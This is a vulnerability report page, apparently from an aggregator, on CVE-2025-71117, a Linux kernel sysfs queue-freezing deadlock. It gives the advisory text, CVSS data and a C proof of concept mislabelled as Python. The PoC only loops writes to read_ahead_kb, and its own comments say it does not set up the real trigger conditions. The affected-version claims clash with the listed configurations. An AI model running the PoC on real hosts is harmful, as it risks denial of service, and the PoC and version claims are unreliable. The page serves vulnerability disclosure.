Security Vulnerability Report
中文
CVE-2025-71117 CVSS 5.5 MEDIUM

CVE-2025-71117

Published: 2026-01-14 15:16:01
Last Modified: 2026-03-25 18:58:06
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: block: Remove queue freezing from several sysfs store callbacks Freezing the request queue from inside sysfs store callbacks may cause a deadlock in combination with the dm-multipath driver and the queue_if_no_path option. Additionally, freezing the request queue slows down system boot on systems where sysfs attributes are set synchronously. Fix this by removing the blk_mq_freeze_queue() / blk_mq_unfreeze_queue() calls from the store callbacks that do not strictly need these callbacks. Add the __data_racy annotation to request_queue.rq_timeout to suppress KCSAN data race reports about the rq_timeout reads. This patch may cause a small delay in applying the new settings. For all the attributes affected by this patch, I/O will complete correctly whether the old or the new value of the attribute is used. This patch affects the following sysfs attributes: * io_poll_delay * io_timeout * nomerges * read_ahead_kb * rq_affinity Here is an example of a deadlock triggered by running test srp/002 if this patch is not applied: task:multipathd Call Trace: <TASK> __schedule+0x8c1/0x1bf0 schedule+0xdd/0x270 schedule_preempt_disabled+0x1c/0x30 __mutex_lock+0xb89/0x1650 mutex_lock_nested+0x1f/0x30 dm_table_set_restrictions+0x823/0xdf0 __bind+0x166/0x590 dm_swap_table+0x2a7/0x490 do_resume+0x1b1/0x610 dev_suspend+0x55/0x1a0 ctl_ioctl+0x3a5/0x7e0 dm_ctl_ioctl+0x12/0x20 __x64_sys_ioctl+0x127/0x1a0 x64_sys_call+0xe2b/0x17d0 do_syscall_64+0x96/0x3a0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> task:(udev-worker) Call Trace: <TASK> __schedule+0x8c1/0x1bf0 schedule+0xdd/0x270 blk_mq_freeze_queue_wait+0xf2/0x140 blk_mq_freeze_queue_nomemsave+0x23/0x30 queue_ra_store+0x14e/0x290 queue_attr_store+0x23e/0x2c0 sysfs_kf_write+0xde/0x140 kernfs_fop_write_iter+0x3b2/0x630 vfs_write+0x4fd/0x1390 ksys_write+0xfd/0x230 __x64_sys_write+0x76/0xc0 x64_sys_call+0x276/0x17d0 do_syscall_64+0x96/0x3a0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK>

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.11:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15(受影响的具体版本需查看git commit 3997b3147c7b68b0308378fa95a766015f8ceb1c和935a20d1bebf6236076785fac3ff81e3931834e9)
Linux Kernel 5.15.x - 6.x(包含受影响sysfs属性的所有版本)
Linux Kernel mainline(修复前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <string.h> /* * CVE-2025-71117 PoC - Trigger deadlock in Linux kernel block sysfs callbacks * * This PoC demonstrates the deadlock condition by repeatedly writing to * sysfs queue attributes while a device-mapper multipath device is being * configured. * * Usage: ./poc <device_path> * Example: ./poc /sys/block/sda/queue/read_ahead_kb * * Note: This is for educational purposes only. The actual deadlock requires * specific conditions involving dm-multipath with queue_if_no_path option. */ #define QUEUE_VALUE "4096" #define LOOP_COUNT 1000000 int trigger_deadlock(const char *sysfs_path) { int fd; int count = 0; printf("Attempting to trigger deadlock condition...\n"); printf("Target: %s\n", sysfs_path); while (count < LOOP_COUNT) { fd = open(sysfs_path, O_WRONLY); if (fd < 0) { perror("Failed to open sysfs attribute"); return -1; } if (write(fd, QUEUE_VALUE, strlen(QUEUE_VALUE)) < 0) { /* Write failure may indicate deadlock or permission denied */ perror("Write failed - possible deadlock condition"); close(fd); break; } close(fd); count++; if (count % 10000 == 0) { printf("Iteration %d completed\n", count); } } printf("Completed %d iterations\n", count); return 0; } int main(int argc, char *argv[]) { const char *default_path = "/sys/block/sda/queue/read_ahead_kb"; const char *target_path; if (argc > 1) { target_path = argv[1]; } else { target_path = default_path; printf("Using default path: %s\n", default_path); } printf("=== CVE-2025-71117 Deadlock Trigger PoC ===\n"); printf("Vulnerability: Linux kernel sysfs queue freezing deadlock\n"); printf("CVSS: 5.5 (Medium)\n\n"); return trigger_deadlock(target_path); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71117", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.383", "lastModified": "2026-03-25T18:58:06.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: Remove queue freezing from several sysfs store callbacks\n\nFreezing the request queue from inside sysfs store callbacks may cause a\ndeadlock in combination with the dm-multipath driver and the\nqueue_if_no_path option. Additionally, freezing the request queue slows\ndown system boot on systems where sysfs attributes are set synchronously.\n\nFix this by removing the blk_mq_freeze_queue() / blk_mq_unfreeze_queue()\ncalls from the store callbacks that do not strictly need these callbacks.\nAdd the __data_racy annotation to request_queue.rq_timeout to suppress\nKCSAN data race reports about the rq_timeout reads.\n\nThis patch may cause a small delay in applying the new settings.\n\nFor all the attributes affected by this patch, I/O will complete\ncorrectly whether the old or the new value of the attribute is used.\n\nThis patch affects the following sysfs attributes:\n* io_poll_delay\n* io_timeout\n* nomerges\n* read_ahead_kb\n* rq_affinity\n\nHere is an example of a deadlock triggered by running test srp/002\nif this patch is not applied:\n\ntask:multipathd\nCall Trace:\n <TASK>\n __schedule+0x8c1/0x1bf0\n schedule+0xdd/0x270\n schedule_preempt_disabled+0x1c/0x30\n __mutex_lock+0xb89/0x1650\n mutex_lock_nested+0x1f/0x30\n dm_table_set_restrictions+0x823/0xdf0\n __bind+0x166/0x590\n dm_swap_table+0x2a7/0x490\n do_resume+0x1b1/0x610\n dev_suspend+0x55/0x1a0\n ctl_ioctl+0x3a5/0x7e0\n dm_ctl_ioctl+0x12/0x20\n __x64_sys_ioctl+0x127/0x1a0\n x64_sys_call+0xe2b/0x17d0\n do_syscall_64+0x96/0x3a0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n </TASK>\ntask:(udev-worker)\nCall Trace:\n <TASK>\n __schedule+0x8c1/0x1bf0\n schedule+0xdd/0x270\n blk_mq_freeze_queue_wait+0xf2/0x140\n blk_mq_freeze_queue_nomemsave+0x23/0x30\n queue_ra_store+0x14e/0x290\n queue_attr_store+0x23e/0x2c0\n sysfs_kf_write+0xde/0x140\n kernfs_fop_write_iter+0x3b2/0x630\n vfs_write+0x4fd/0x1390\n ksys_write+0xfd/0x230\n __x64_sys_write+0x76/0xc0\n x64_sys_call+0x276/0x17d0\n do_syscall_64+0x96/0x3a0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n </TASK>"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nblock: Eliminar la congelación de la cola de varias devoluciones de llamada de almacenamiento de sysfs\n\nCongelar la cola de solicitudes desde dentro de las devoluciones de llamada de almacenamiento de sysfs puede causar un interbloqueo en combinación con el controlador dm-multipath y la opción queue_if_no_path. Además, congelar la cola de solicitudes ralentiza el arranque del sistema en sistemas donde los atributos de sysfs se configuran sincrónicamente.\n\nSolucione esto eliminando las llamadas blk_mq_freeze_queue() / blk_mq_unfreeze_queue() de las devoluciones de llamada de almacenamiento que no necesitan estrictamente estas devoluciones de llamada. Agregue la anotación __data_racy a request_queue.rq_timeout para suprimir los informes de condición de carrera de datos de KCSAN sobre las lecturas de rq_timeout.\n\nEste parche puede causar un pequeño retraso al aplicar las nuevas configuraciones.\n\nPara todos los atributos afectados por este parche, la E/S se completará correctamente ya sea que se utilice el valor antiguo o el nuevo del atributo.\n\nEste parche afecta a los siguientes atributos de sysfs:\n* io_poll_delay\n* io_timeout\n* nomerges\n* read_ahead_kb\n* rq_affinity\n\nAquí hay un ejemplo de un interbloqueo desencadenado al ejecutar la prueba srp/002 si este parche no se aplica:\n\ntarea:multipathd\nRastro de Llamada:\n \n __schedule+0x8c1/0x1bf0\n schedule+0xdd/0x270\n schedule_preempt_disabled+0x1c/0x30\n __mutex_lock+0xb89/0x1650\n mutex_lock_nested+0x1f/0x30\n dm_table_set_restrictions+0x823/0xdf0\n __bind+0x166/0x590\n dm_swap_table+0x2a7/0x490\n do_resume+0x1b1/0x610\n dev_suspend+0x55/0x1a0\n ctl_ioctl+0x3a5/0x7e0\n dm_ctl_ioctl+0x12/0x20\n __x64_sys_ioctl+0x127/0x1a0\n x64_sys_call+0xe2b/0x17d0\n do_syscall_64+0x96/0x3a0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \ntarea:(udev-worker)\nRastro de Llamada:\n \n __schedule+0x8c1/0x1bf0\n schedule+0xdd/0x270\n blk_mq_freeze_queue_wait+0xf2/0x140\n blk_mq_freeze_queue_nomemsave+0x23/0x30\n queue_ra_store+0x14e/0x290\n queue_attr_store+0x23e/0x2c0\n sysfs_kf_write+0xde/0x140\n kernfs_fop_write_iter+0x3b2/0x630\n vfs_write+0x4fd/0x1390\n ksys_write+0xfd/0x230\n __x64_sys_write+0x76/0xc0\n x64_sys_call+0x276/0x17d0\n do_syscall_64+0x96/0x3a0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n "}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attack ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.